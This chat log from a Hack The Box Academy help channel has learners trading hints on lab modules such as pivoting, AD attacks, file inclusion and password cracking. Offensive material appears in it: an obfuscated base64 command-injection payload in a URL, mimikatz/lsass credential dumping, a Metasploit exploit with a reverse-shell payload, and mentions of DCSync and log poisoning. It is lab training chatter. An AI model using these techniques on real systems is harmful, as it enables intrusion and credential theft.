#modules

So

i had to reset the machine 5x

eventually worked.......I've had so many problems with machines dying and spending hours not understanding what happened

lol

just had whats likely a pretty serious rule break, whats best way to get ahold of moderators?

DM an active mod

Well hopefully someone see that

anyone else having issues with Remote File Inclusion in file inclusion. The pwnbox display cuts off a lot. And none of the commands on the page work. I put any of them in the box and it gives me a connection timed out. Same thing if I vpn and try it in my vm

Am I supposed to use a custom version of mimikatz for the AD skills assessment module or am I overthinking?

I uploaded mimikatz 3 times with wget from different places but none of them run even with disabled av

I am trying to view the source code for an upload.php file, I'm currently unable to figure out how to find it. I've tried doing an .svg file on a file upload form to be able to read the upload.php source code but am unable to think of a way to be able to view it. if anyone could help it'd be greatly appreciated just send me a dm 🙂

no, I had no issues

I tried with mimikatz.exe and invoke-mimikatz

And both shit themselves

@thorn urchin Where did you get mimikatz from?

idr

probably standard

theres no AV or anything at all preventing it.

I've been trying all sort of ways but it doesn't run for me

Did you use .exe or invoke?

I used the .exe

when I did this is literally just didnt work and was broken, I just used different stuff entirely

Just keeps getting stuck there

for the 10th time

can always try snagging the one from one of the sections C:\tools

Thought of that

But it's such a hassle D:

But it would save me time xD

Even with the snagged versions it's bugging out for me

Is it because I'm using a powershell reverse shell with nc?

It's what I always do ..

¯_(ツ)_/¯

but if the section version doesnt work then def something about your setup thats messing with things

try using the cmdline options instead of interactive and redirect output to text file

ok learning the fundamentals to linux and i'm trying to find a file name, but when i try to ls the return i get an error

anyone know what i'm doing wrong?

long story short, i'm trying to answer this question

nevermind, realized i forgot the "\; 2>/dev/null" at the end

Time to go get breakfast

hey all, can someone provide a nudge for the following question: After escalating privileges, locate a file named confidential.txt. Submit the contents of this file. Module: Windows Privilege Escalation - Skills Assessment Part 1 - what ive tried so far: Findstr ( various methods) did find a file called backups - however no access to this directory, but do not think this is the correct way to go about it.

You can type keywords in the windows search bar but not sure if that's intended method of searching

i did try this, but only as a the whole text. will try as keyword. Thank you

other method finding files with cmd
dir /S /B file.txt

I think it searches recursively from directory you're in and under

PERFCT thats what im been looking for! I knew there was a command search with CMD, and every time I typed alternatives for findstr in windows in google, it wouldnt show. I shall try this now

@shadow canopy I appreciate your help, it has found the txt file. thank you kindly.

np 👍

Module Pivoting, Tunneling, And Port Forwarding - SKILL ASSESMENT :

• Question 6: "For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation"

Need nudge for this, i dumped the ||lsass|| from ||mlefay win machine|| and found cleartext psw for ||vfrank|| . tried to directly access via mstsc.exe to || vfrank at 172.16.6.35 from the mlefay 172.16.5.35 win machine|| but ended up in the same machine with just the new user, didnt manage to pivot to the actual machine, any help? kinda confused

||the ip x.x.6.35 is a rabbit hole||

maybe is the ||x.x.6.25?|| cuz i just found that rn

yep

dope

i'll try to understand how to get there haha

hint:|| port||

yay, did it! thank you 🙂

no problem ^^

could anyone @everyone help me out what will be the key input for the capture the flag :hackweek event which is going to start on 23march.....i couldn't join cause its promoting with input key to add

if you don't have it, then you cannot join

how to get that

only the organizers can give you the key

How do I fix this?

Hey everyone! I could really use some help with a Twig SSTI challenge. For some reason injecting {{_self}} or {{_self.env}} errors out. I am failing to retrieve the environment variables

I need help with Attacking SQL Databases please DM me

Can someone give me a pointer for the last question in Active directory Skill assessment 1?

Did you run mimikatz with enough privileges?

I ran it as admin and privilege::debug gives 20

Did you token::elevate?

I have once, but not now

Same error

Also there could be an issue with the version of mimikatz

Sometimes using an older version works

I got a problem with section Web Server Pivoting with Rpivot in the module Pivoting, Tunneling, and Port Forwarding. The command proxychains firefox-esr 172.16.5.135:80 doesn't work for me. I get a lot of errors and firefox won't load that page, even though the rpivot server-client connection has been setup properly and is running. Instead of proxychains firefox-esr 172.16.5.135:80 I used curl: proxychains curl http://172.16.5.135:80 which gets me the page. I saw a fragment which probably is the flag: || I_L0v3_Pr0xy_Ch@ins||, but it's not accepted as the answer. I can't see anything else with curl.

Got it. Had to copy/paste the flag from the curl output to notepad and from notepad into the answer field. Probably some unicode error.

Any help with Hacking Wordpress, the very first assignment, I'm supposed to look through directories mentioned in the instruction for Flag.txt, went through all of them (only like 2 worked) and cant find anything EDIT: 'Manually enumerate' yeah right, bs instruction as usually

Hi guys I am solving the module Password Attacks and the section Pass The Ticket(linux). In the optional exercise the question is "Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished." I am using the following scp command "scp /tmp/krb5cc_647401106_HRJDux kali@10.10.14.161:/home/kali" But i am not able to transfer the ccache file

if you take a screenshot of the directories mentioned in this section https://academy.hackthebox.com/module/17/section/41, and then try each of them out...do not forget the end with a "/" otherwise you may get funny results

does any body finished XSS please ?, i want to ask phising part stuck their i dont know what to do at this part confused to get the flag

Hi,
I'm stuck in socks5 tunneling with chisel in the pivoting module.
When i want open chisel on the pivot target i have this error :

ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)

I see we need instal lib6 :

sudo apt-get install libc6

But it's not possible on the target host.

Anyone have another solution ?

Download the binary (I think version 1.7.4 worked for me)

Thanks but no it's the same ...

I am having trouble with ACADEMY-EA-DB01 host (172.16.5.150) is it working ?

I need the last flag of privileged access section

I tried many version and is exactly the same result for each.

Regarding "Skills Assessment - File Upload Attacks". I'm not finding any way to come up with a POST request. I believe the ||image upload form|| should be the target, but I can't really do much without any POST requests. Any help?

EDIT: FFS... It seems that the browser in the pwnbox somehow filters the POST request through. Tried with my own VM with no troubles at all. Once again spent an hour trying to figure out a thing that wasn't even a thing.

mm, as far as I remember, use the chisel 1.7.4 binary on the HTB machine, with their respective configurations, and for the attacker's machine use the latest version of chisel

I just saw, on the forum they also advise the version 1.7.4 but for me it gives me the same result.
I am completely blocked ...
I try other techniques to recover the flag but nothing works

scp ~/Tools/chisel-1.7.4/chisel ubuntu@10.129.114.95:~/

ubuntu@WEB01:~$ ./chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)

hi guys i need help with Pass the Ticket(Linux) Optional Exercise

what binary are you downloading?

1.7.4 & 1.6.0

and the name of the file?

I downloaded the zip with 1.7.4 verison and build as it is indicated in the course

cd chisel-1.7.4
go build

scp ~/Tools/chisel-1.7.4/chisel ubuntu@10.129.114.95:~/

ubuntu@WEB01:~$ ./chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)

nope you don't have to download the .zip, download chisel_version_linux_amd64.gz

and then you make the transfer

do not build this version of chisel on your machine

The same 😭

Oh wait is good ! I try to continue !

Hi, I'm doing the Getting Started module. I've been able to do the manual way, but for the life of me, Metasploit doesn't work. LHOST is pointed to tun0:4444

All is good !
Thanks a lot !
Always good advice !

no problem ^^

did you actually put it as LHOST tun0:4444 or LHOST tun0 LPORT 4444

can anyone help me out i am stuck here in this module
https://academy.hackthebox.com/module/109/section/1042
http://139.59.189.170:31454/index.php?to=&from=696212415.txt bash<<<$(base64 -d<<<bXYgJHtQQVRIOjA6MX1mbGFnLnR4dCAlMDkke1BBVEg6MDoxfXZhciR7UEFUSDowOjF9d3d3JHtQQVRIOjA6MX1odG1sJHtQQVRIOjA6MX1maWxlcyR7UEFUSDowOjF9dG1w)&finish=1&move=1
its says malicious request denied

Hey, I am currently at the Knowledge-Check of the getting started section. I found the admin credentials and was able to log in as admin.

Also, I found an exploit on MetaSploit for GetSimple v. 3.3.15:
exploit/multi/http/getsimplecms_unauth_code_exec

My options are:
Module options (exploit/multi/http/getsimplecms_unauth_code_exec):

Name Current Setting Required Description

Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.129.114.223 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the cms
VHOST no HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description

LHOST 10.10.16.3 yes The listen address (an interface may be specified)
LPORT 1337 yes The listen port

When I run this exploit, I get this:

[*] Started reverse TCP handler on 10.10.16.3:1337
[*] Exploit completed, but no session was created.

Can somebody give me a hint what I might be doing wrong / should (re)consider?

I'm working on AD Enum&Attacks: Attacking Domain Trusts - Child -> Parent Trusts from Linux. I'm trying to get the NTLM hash for the domain admin bross. I've created a golden ticket. I can login to the DC with psexec, but I can't get secretsdump to work to grab the hash. Shouldn't I be able to do a DCSync with secretsdump?

I think I figured it out. Anyone else that may have this issue, the golden ticket seems to expire after a short time and you may need to run secretsdump shortly after generating the golden ticket to have it work

I personally didnt go the metasploit route, but if meterpreter isn't working you could try a simpler payload option which will fix it sometimes

I believe there are multiple exploits that show up when you search for getsimple, make sure you are using the right one

1v1 anyone?

or 2v2?

Thanks, I found my mistake: I used the wrong LHOST, I unknowingly had two openvpn connections running

Thank you, I now have the meterpreter shell

1v1 what? 😄

hack the box?

1v1?

yeah sure 😄

what's the target? 😄

cyber mayhem

ok 😄

why do you keep doing that emoji

Don't question him 😄

.

yo, this channel is for module and academy discussion only

yes, i believe so

Hey, just joined. I'm having a problem with the "starting point" submit root flag. Hopefully I put this in the correct thread 😅

then maybe you should read #rules and #welcome then ask in the appropriate channel.

hello and welcome, just a quick one, for future reference any issues you are having.... provide the full module name and the section including question ( and sometimes even a link) as easier to provide the help by others in here. Best of luck on your journey

anyone know the userlist for Attacking Common Services - Easy

starting point has nothing to do with modules or academy, theyre just flat out in the wrong channel

I know its ||smtp|| but the resources provided isnt working

you use the provided word list

if it isnt working then your method is incorrect

||smtp-user-enum -w 25 -M RCPT -U users.list -t 10.129.203.7 -v ||

this?

idr which method was the correct one. Id have to go back and redo the section

but only one of the three ways it discusses will work

three ways you mean like RCPT, VRFY, etc.?

ye

great thanks

whilst i agree they may possibly be in the wrong channel ( "Getting Started" is also a module on academy so i was unsure what the question exactly meant). but nevertheless and more importantly once the user gets to the correct channel they will be aware how to best post a question so it can be answered easily.

Hi i keep getting this error when trying to damundsen to help desk level 1 group in ad attacks and enum and its just so hard to troubleshoot alot of this active dir stuff

At C:\Tools\PowerView.ps1:11684 char:17
+                 $Group.Members.Add($Member)
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : PrincipalExistsException```

include your full command, just the error is kinda useless to us.

Also for formatting you can enclose it in triple backticks ` it makes it more readable.

c:\ mypowershell.ps1 -Argument args

Ok idk discord formatting ty

Command was ```Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2

sounds like the user has already been added to the group

seriously but that was the first time i did the command let me scan the members rq

active directory stuff is so hard for me to troubleshoot on my own because google does not help

AD aint easy, this module is widely regarded as the hardest module in the path for good reason, and its not because of the quality

ty makes me feel less bad for struggling

theres an AD fundementals course on academy as well that takes you through actually configuring one n stuff that may be worthwhile. I havnt done it but Ive considered it.

hello. Do I need to register another account for the academy part of the site?

yea

Hi anoyone could gave me ideas for Attacking Common Services - Easy, tried bruteforcing with resources list all the services and for now found nothing, enumerated quite well port 80 but I dont think is an exploitation way, the port 443 is http simple auth til had not tried via that port, in conclusion what should I try next?, thanks in advance

unfortunately my notes are sparse on that one, but those labs ratings are out of order. the Easy one is actually the hardest lab. So if you get too frustrated go clear the medium and hard labs first.

ok

Enumerating ||HTTP or HTTPS should reveal a user with that user try bruteforcing the other services||

I am doing parameter fuzzing and I am trying to run the following command, but I am not getting any results (https://academy.hackthebox.com/module/54/section/490)

This is is the command: ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://IP:PORT/admin/admin.php?FUZZ=key

But this is not working at im not sure why

remove the slash after ip

I did it puts it on discord not sure why

use triple backticks ` for formatting in discord

so looks like this

Could I ping someone for some assistance w.r.t. AD Enumeration & Attacks - Skills Assessment Part II?

Specifically, Q8: Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

screenshot?

I think the issue is that I need to scan admin.academy.htb but idk how to get the ip for that

I used subdomain fuzzing to find that it exists, but I can’t locate to it, so I’m guessing I need an ip to add to my dns?

Take a close look at the output from the NMAP scan.

you fuzz using the IP that you are provided with

Ok let me try

multiple sites and subdomains can exist on the same IP afterall 🙂

How do I access the other site on the same domain? I don’t understand

@thorn urchin

It just returns the same ip when I get a hit

add it to your /etc/hosts

might not be a real site btw

But it’s the same ip is the problem

Will it still work even if it’s the same ip?

that's not a problem

Oh ok

Let me try

thats how vhosts work

just again, it may not be a real site anyways

so it you dont get anything even after adding to /etc/hosts its possible its because theres nothing to get.

Ohhhh okay!!

It worked thank you (:

https://dasunhegoda.com/what-how-to-apache-virtual-host/444/

heres more info on the topic

its one of those foundational knowledges the modules assumes you already know

Ah okay

Ill check it out

Is there a specific discord channel to discuss pro labs in particular Dante? Thinking about starting that one

yes, but you will need to verify first - #rules and #welcome

Imagine trying to finish assessment on SNMP and the provided IP address does not have pop3/imap/snmp open. HARD Reset

Also. Now that I reset the instance, the same syntax I used to answer Q1 no longer works (which worked previously)

#prolabs-dante

ohh thank you

Ok. Yeah. Anyone elese having issues with Attacking Services - SNMP?!

Ports are open, I go to brute-force for valid user, they close.

try slowing down your threads for brute forcing :)

Show cased tool and intended tool doesnt have threading

I guess processes is threading. It worked first time just fine

Is there anyone that could grant me some assistance w.r.t. AD Enumeration & Attacks - Skills Assessment Part II?

I have compromised SQL01 (SYSTEM priv), I have the Administrator's hash and found a password Su...rE, but I don't know what I'm meant to do from here to attain Admin privileges back on MS01.

Can anybody explain why my windows firewall in detecting a Backdoor:PHP/Remoteshell.F on SQL injection fundamentals cheat sheet download 😄

Or more if anybody else is having that problem

Defender detects the PHP Webshell 😉

I had this issue today, contacted support they assured that it's ok. It's just due to the code snippets in the file

^ defender is doing it's job as the code snippet - indeed - would be considered a backdoor if used maliciously

😛 I checked later that its safe, i was just baffled why it gives the error

Thanks for the info boys

this is why my notes and things are in a folder that I've whitelisted for defender

https://support.microsoft.com/en-us/windows/add-an-exclusion-to-windows-security-811816c0-4dfd-af4a-47e4-c301afe13b26

Has anyone completed File Inclusions Skill Assessment? ||I've searched the website and could only find the p... parameter and a m...... parameter but couldn't exploit them... I tried fuzzing for other php pages and then fuzzing those for parameters but nothing|| any hints? ||fuzzing for post parameters but nothing yet||

Thanks for this

It would suck if your notes suddenly disappeared because defender was just doing it's job

|| mimikatz || is your friend

Try || to read the PHP code ||

Read the PHP Filters section

Woops bunny was faster

ahh I see thx!!!

Not sure I follow. I used mimikatz to pull a plaintext cred for a user "S...E" but it didn't apply to anything I could find.

It does, youre on the right track

Hi again! I remember you saying the same. I took a 2 week break and am trying to re-approach the problem again.

Ye, that password IS used somewhere, unfortunately just no way to tell you where without just spoiling it.

On the skills assessment for Active Directory Bloodhound, "Find the percentage of users with a path to GLBOAL ADMINSITRATOR" -- how? I conceptually knew what I was trying to do (neo4j cypher query wise, but failed), brute-forced the value, back-tracked to how it is derived, but still (a) can't figure out a query that would generate it for me (even though I do have queries that will generate a %), and (b) can't figure out how to automatically calculate the numerator of the equation (I can look in bloodhound and manually count)...

Check out this cheat sheet
https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/

Yes, I am familiar with that cheatsheet, which (among other things) shows how to automatically calculate a %... but I still can't figure out a query for calculating the numerator of the equation (# of users that connect to global administrator)

Check the nodes. || You must use the Azure nodes.||

okay I'm on the last step of File Inclusion Skill Assessment and I know what I have to do... only problem is does anyone elses lab instance die immediately ||after doing a log poisoning attack?I can successfully poison the logs, but shortly after executing the command like id the lab crashes||

Restart the Lab

well I have to it crashes and that's the only option😂 but during the section from earlier it did that as well. It crashes as soon as I execute

poisoning logs in pretty risky and error prone, you gotta have a perfect payload for the target or else its gunna fail, minimum brick the exploit path if not the whole web app and ya gotta reset the environment

Swear I did all that, but in re-putting it together, now works, so thx 🙂

its usually my option of last resort.

@thorn urchin ...oh my lord. Shoot me in the face...

And here I was going "bUt I aLrEaDy SiGnEd In To MsSqL..."

but that's the only way to solve this lab I believe

A break through, but an embarassing one. Thanks for humoring me

hey you got it though!

could I DM someone about this I swear it's the labs fault but I want to confirm

it is, Im just saying expect to brick it a lot debugging it

well it's not even bricking atm but the logs aren't populating. I'll try another restart

this is so frustrating😫

OMG FINALLY

that was such a pain😭

remember if the box itself isnt bricked you can check the error.log to see the php error message about what went wrong.

I did forget about that, but the issue was mainly the box dying lol

Password Attacks - Medium: I am stuck trying to get root. I am logged in as d*****. looked at .bash_history, and rsa keys..but im not having any luck...any hints would be appreciated...

AD Enum and Attacks - LOTL utilizing techniques learned in this section find the flag hidden in the description field of a disabled account with administrative privileges.

anyone up for some help?'

Hello, I am new to hack the box and am running into a little issue on my terminal. Can anyone guide me in the right direction?

May I have some assistance with Pivoting, Tunneling, and Port Forwarding - Skills Assessment Question 6?

When I RDP into the found 172.16.6.XX with found users credentials from previous questions the machine has the same folders/files/flag as question 4.

I'm a little lost.

Disregard - I figured it out. Thank you guys anyway.

is it module related? if not then no read #rules and #welcome then post in a more appropriate channel.

hi

case 5 on the sqlmap i was able to get the flag but it doesnt seem to be accepting it. anyone else having this issue?

nvm it replaced one of the letters with } but i was able to make a decent guess as to what it was

if thats one of the time based ones then yeah sometimes it just isnt perfect and you have to do a little human guesswork

yea it was one of the OR time based payloads.

yup normal issue with that vuln type

whats wrong guys?

any help please?

I think its not called csrf-token on the assignment ( not at home so i cannot check my notes) @naive sky

so what should i do?

I am running into problem with how to use some tools with the IP:PORT format for the target machines for nmap I have tried a few combinations but they are not working for me saying host down or cannot resolve. For example "nmap -p- -sV -sC 173.43.23.140:30921". Am i missing something?

I have tried looking at exmples but they use ip's without the :port so not sure if im doing it wrong

-p- scans all 65535 ports, if you want to be port specific, be like -p$Portno. e.g say I wanna scan only smb and netbios : -p445,135-139 ... there is absolutely no need to use -p- and -p445,135-138

that port is the docker ip right? I dont wana scan that port but how i connect to it

its what i enter into the url and when i just use the IP nothing

the target ip is given to me as x.x.x.x:30245 for example

thats whats confusing me

Read it from the code.

You could specify what section youre in so someone can better understand how to help, but from experience since starting academy, only a specific service runs on a docker host on a port and thats the only service of interest for the specific assessment, in that case there is no need for a port scan cause thats the only port youre asked to carry out the task on.

Ahhhh that makes sense. Im doing pentesting basics, public exploits.

In my mind i access the target through IP:PORT then once there the machine still had all the normal ports. So was little confused. Got it now thank you!

Hello can someone help me with this module, im doing password attacks where i need to bruteforce a ssh login with a custom wordlist. it has 94k words so it takes like 3 hours to fully bruteforce the login. Can someone give me the first letter of the password so the bruteforce will go a little bit faster?

filter the words that start with 'B' and create an additional wordlist based on that

Active Directory Assesment 2 ""Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What this user's account name? "" I found the Username but i am stuck on finding/dumping the hashes
Any suggestions?

with genericall you can force change a user's password

@autumn pilot yes but if i do that its gonna change the hash and the question asked is Crack this user's password hash and submit the cleartext password as your answer.

i did a bloodhound sweep and was able to get the username C****

nvm got it

Having the same problem right now. Did you manage to find a solution?

version 1.7.4 finally worked

Nvm, got it working.

I downloaded 1.6.0 and it worked immediately.

They should really update this box.

Hello guys somedoby know if i can use proxychains with the vpn of htb?

it is explained in pivoting, tunneling and else module

it is so harder

Yes.

Trying to run WPScan on target of WordPres Skills Assessment, but getting: Scan Aborted: The remote website is up, but does not seem to be running WordPress.

Shouldn't they put WP website on the WP skills assessment

you need to find it 😄

Can you give me little pointer, is the link in the source code supposed to work? B***.inlan****.loc***

directory search the page

use something like dirsearch or gobuster or something

Okay I think I figured it out, failed to add it as a host at first but tried again and succeeded, thanks for help

While you're at it did you get ptunnel-ng to work? autogen.sh is riddled with errors.

question: I am working on the "Firewall and IDS/IPS Evasion Easy Lab" There is a status page given to me that displays how many 'recorded alerts' the system gets. before i start doing anything i have 16 alerts and the number grew to 100 in just a few seconds (i refreshed the page a bunch) and I was 'banned for 3 minutes'. but I did not even begin to run my own commands. is this normal?

you need to install autoconf as it is written in the error

guys im having problems downloading the openvpn

No. It's all whole bunch of other shit. Will see if installing those solves anything.

In my case it worked

see if this helps, https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting

thx

Yeah, didn't work. Instead i just used Chisel again and got the flag that way.

I'm stuck on the skill evaluation - Pivot, tunnel and port forwarding.
I got the lsass.dmp file and recovered the hash of vfrank on my kali but I can't find a word list that works to crack the hash

anybody an idea why this error occrus?

I use|| mimikatz|| and save me from performing those lsass steps

So you uploaded mimikatz on the windows machine?
Anyway the password is on the forum but I should have used mimikatz directly instead of getting the lsass.dmp file.
Now i try use ntsh.exe but I'm a bit lost in the ip to use with all the port forwarding

yep, performing the file transfer.
For the second case you have to search for|| x.x.6.x|| ip addresses, be careful because there is ||1 which is a rabbit hole||

Hello can any one teach me how to post code on here correctly? Please

Hi guys, can anyone explain what Security Least Access is, I don't understand

Can i DM you ?
I'm mixing everything up and I can't think straight anymore

sure, no problem

Yo im stuck on Pivoting first one. how do i enter rdp. I tried following all the steps from the module but i dont get it

Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag? I've re-encoded the cookie as the "super user" and it still does not allow me in, what might I be missing here?

I'm in but dont have the flag so I'm confused what to do at this point

most likely it's expecting you to use things like; curl, whatweb, or firefox to enumerate and look at the webpage

if it's a docker image you generally cannot nmap those

Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Kerberoasting - from Linux

Question: Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.

I tried the commands on that page, but it asks me for a password in order to get those TGS tickets, am i supposed to dump some hashes and crack them?

if you're using kali or parrot; openvpn is already installed

I got stuck in first module/Vulnerability Assessment. The question is: "What type of analysis can be used to predict future probabilities? " and my answer was: "Predictive Analysis". It would be great if someone can help

try taking off the word "Analysis"

I did that and it worked, I think a space ruined it when I copied it the first time. Thank you!

Please I need help

For sqlmap

lol

Skill assessment styckt

haven't done that; don't just reply to me on something unrelated to your issue

Some body done that ?

if you're stuck, reread the module and double check you're doing everything right instead of just copy/paste

I have read it

But I got stuck which tamper to use

There are alot

It's not effective to use one by one

then keep trying while you wait for someone to assist you

But the chat would gone

it still exists

How could some oneknowz

the chat doesn't just "disappear"

Anyone here completed the CrackMapExec Module ?

Because many of questions I have asked before no body response : 😭

Really sad

people will scroll up and read if they are wanting to help; i know a handful of people that just lurk in here JUST to answer questions

but you're also banking on complete strangers as well to just help you out

also your questions in the past have been bad questions. you're either restating the exact question from the module or not giving enough context to actually get an answer so most people don't bother to even try (which sucks I know).

zegaf its going to be okay I asked a question a while ago and if nobody answers I'm just gonna keep working on it and try to figure it out. If nobody responds in an hour I might repost it but no need to spam

Yes its frustrating sometimes and sometimes we just want immediate help and answers but I promise it will be okay.

fully read this webpage: http://dontasktoask.com/ it talks briefly about rephrasing a question to get the answer you are wanting instead of beating around the bush. https://stackoverflow.com/help/how-to-ask there is also this effective link; alongside this slightly longer article: http://catb.org/~esr/faqs/smart-questions.html

while I will just simply paste/type in http://dontasktoask.com - it's not 100% to be a dick about it, it's a way of saying - take a look at this, then at your question and ask yourself - is this phrased in a way that would get me my answer

there is also a link on the dontasktoask page to something known as the xy problem; which I also recommend taking a look it

im still stuck on the first section pivoting, tunneling and port forwarding. I dont get what i am doing wrong i tried everythin step by step but it doenst work. any tips?

as long as your proxychains conf is correct, you will be good to go

^

just make sure your proxychains.conf file is correct

you may need to comment out the other proxy mode - not sure if that plays a role - but I had issues when I had both of them on. But it could just be that my vm was being weird

what means correct

if you are trying to use port 9050 within your ssh command and that port is not configured in your proxychains conf, then it will simply not work

correct means that in your /etc/proxychains.conf file if you do
tail /etc/proxychains.conf you see

socks4 127.0.0.1 9050
socks5 127.0.0.1 1080

if you're on the first section then at the moment I believe they only want you to do the socks4 9050 - but what is that section called so I can take a look?

Dynamic Port Forwarding with SSH and SOCKS Tunneling

read that part of the module

:)

but my in my proxychains config i just have
socks4 172.0.0.1 9050

then edit the proxychains.conf

yeah i did multiple times

because it should be 127, not 172

oh yeah i mistyped sorry

anyway what are you saying is going on that is making it not work?

Hi everyone, just need a clarification regarding the test in the metasploit module about payloads. How can I guess that the remote machine is running Apache Druid only knowing this nmap report :

└──╼ $nmap -sV -Pn -p-10000 10.129.203.52
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 17:04 CET
Nmap scan report for 10.129.203.52
Host is up (0.025s latency).
Not shown: 9993 closed tcp ports (conn-refused)
PORT     STATE SERVICE   VERSION
22/tcp   open  ssh       OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
2181/tcp open  zookeeper Zookeeper 3.4.14-4c25d480e66aadd371de8bd2fd8da255ac140bcf (Built on 03/06/2019)
8081/tcp open  http      Jetty 9.4.12.v20180830
8082/tcp open  http      Jetty 9.4.12.v20180830
8083/tcp open  http      Jetty 9.4.12.v20180830
8091/tcp open  http      Jetty 9.4.12.v20180830
8888/tcp open  http      Jetty 9.4.12.v20180830
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.39 seconds

I've seen that Apache Druid uses Apache Zookeeper, is there an information here telling me that the remote is running Druid ?

you can also try doing whatweb <IP>:port

sometimes it's either just knowing services or google

Indeed ! Thant you very much 🙂

omfg i just had to keep ssh open

im dumb sorr

y

that makes sense

... how can you proxy if your proxy isn't open xD

yeah thats why i tought like putting in the ssh server

in the proxychainsconfig

but now this makes more sense

It's always the simpler way

i got the flag but when i submitted why its wrong

any help?

could be because you have a tiny space at the end, or its for a different question

no it was fine same clearly

its really weird

could i dm ?

wrong flag for that question?
Log out and log in?
refresh?

same 😢

is flag format correct? space may throw the validation

its correct, but says incorrect

Ok, PEBCAK.
Stuck on Password Attacks Medium Lab.
Unable to take advantage of ssh keys found with user d***** . Read through most of the previous hint. Going nowhere.
Would be great if someone could assist (DM).

you do a lot of back and forth in the labs i take it the ssh key is password locked? If only there was a way to crack it

its correct, but says incorrect

idk, I cant fix it for you, maybe its a bug on their side?

I've had it say the flag was wrong a few times, I just kept submitting until it accepted it

what is wrong?

@fathom pendant
Indeed. That was my first approach. Used john, hashcat, etc from the modules with resources list and other lists. Nadda.
So, looked at the history of user and attempted to mimick for ssh. No go.

hey guys im on the attacking common services module and trying to do the mssql stuff. I have a password for mssqlsvc, but can't log in to see flagdb. Can anyone help :)?

Im not sure… did you open that .csv file? Just in case…

empyt

really dissapointed

I think i had this before and restarted the machine… i can’t remember though because i did it along time ago before i started taking good notes

I've had to reset stuff a bunch dont be afraid to mark down how you got there and just reset it. Super frustrating at times I 100% feel you but dont be afraid to reset shit or you will spend hours getting nowhere like me

@fathom pendant
Nevermind; figured it out!

hi guys i am

really i hate this errors

actually whats wrong

Guys how do I start vpn on windows?

https://giphy.com/gifs/confused-zoolander-center-for-ants-OCMGLUo7d5jJ6

Have you finished?

Did you understand from the picture

no about 50 percent througfh

i cant see the pic

too small

Then same

Bro

Let me dm you is it ok?

ok

How do i use the (new) cloudflare WAF Firewall bypass on Metasploit Kali Linux?

what module

hey guys, How Can I reach out to HTB Academy via email? When I try to log into the academy, asks for 2FA OTP code, But I dont have access to it anymore

click on the support chat bubble

if you dont see it, disable ad block

Anyone able to help with the SQL Injection Fundamentals Skills Assessment? Found the directory I can write to, and read the source code for index, dashboard, and the config file but unsure of where to go next. EDIT: nvm. figured it out. There was something I thought I tried earlier that ended up working. Sigh

Can I access to it without being logged in?

yes

if its still not there you can try the support bubble on the main site

yo guys

I cant see the support bubble on htb academy's site

(disabled addblock)

why are you trying to run the vpn on windows; you should be running the vpn on your virtual machine not your host

i'm having some trouble with file upload attacks -blacklist filters nvm... I swear I tried this filter earlier and it didn't work but second time it did

lol i was gonna suggest to try one of those in the ||pics in that module, maybe with some more thing added||

thats pretty spoilery

like this? haah

the goal of the section is to learn the methodology of finding the answer, so telling someone the answer defeats the point.

no, like you shouldn't have it even in spoiler tags

my bad, i didnt think it could've been that spoliery

in some other modules it might not have been, but this one heavily focuses on the process of discovery, so telling a working extension skips the point.

be like on the enumeration module telling someone what high level port service they missed instead of how they couldve found it.

this is gonna be fine

hahaha

yeah that might be better lol

hahaha yeah

Having some dumb trouble ran out of time doing last question on wordpress assessment. I have switched out my /etc/hosts/ for the new IP and i'm not able to get back in

of course after I post it immediately works lol

nvm

sometimes parts of the lab take a little longer to spin up

I'm doing the** Active Directory Enumeration & Attacks** module, i'm at the Kerberoasting with Linux section and i didnt understand if i first have to find some hashes somewhere else and crack them before trying the suggested tool in this section, I mean i tried it but it prompts me a password for the win user which i dont know.
the exercise is this: Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.

idr for that one specifically but some of those sections expect you to rely on creda found in previous sections. Can tell if theyre reusing the same user in the section examples for the attack.

thank you i'll double check that later

hi

madf0x is right... for all of AD I'd recommend writing down any user:pass combinations you find, because you will need them

yeah gonna check all the ones i've already found 🙂 thanks

it should be there mentor to help students problem like what i faced here

This is included in the Silver annual subscription.
https://academy.hackthebox.com/news/7-dec-2022

oh i see

if students subscription isnt there ?

so sad

